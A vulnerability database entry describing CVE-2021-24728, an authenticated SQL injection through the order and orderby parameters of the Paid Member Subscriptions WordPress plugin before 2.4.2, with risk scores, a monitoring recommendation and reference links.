CVE-2021-24728

Paid Member Subscriptions < 2.4.2 - Authenticated SQL Injection

EPSS 1.7%CWE-89

Vexday Risk Score

3Low

SSVC decision (CISA)

Track

No exploitation signal → monitor

CVSS —EPSS 1.7%KEV nãoPoC —Nuclei —Metasploit —Patch —

Lifecycle

13 Sep 2021Published on NVD

Recommendation: Monitor — no exploitation signal at the moment.

The Membership & Content Restriction – Paid Member Subscriptions WordPress plugin before 2.4.2 did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages.

Affected products

Unknown · Membership & Content Restriction – Paid Member Subscriptions

Want to know if your infrastructure is exposed to this?

Talk to TrueHacking →

References

https://plugins.trac.wordpress.org/changeset/2566399/paid-member-subscriptions https://wpscan.com/vulnerability/2277d335-1c90-4fa8-b0bf-25873c039c38 https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=29172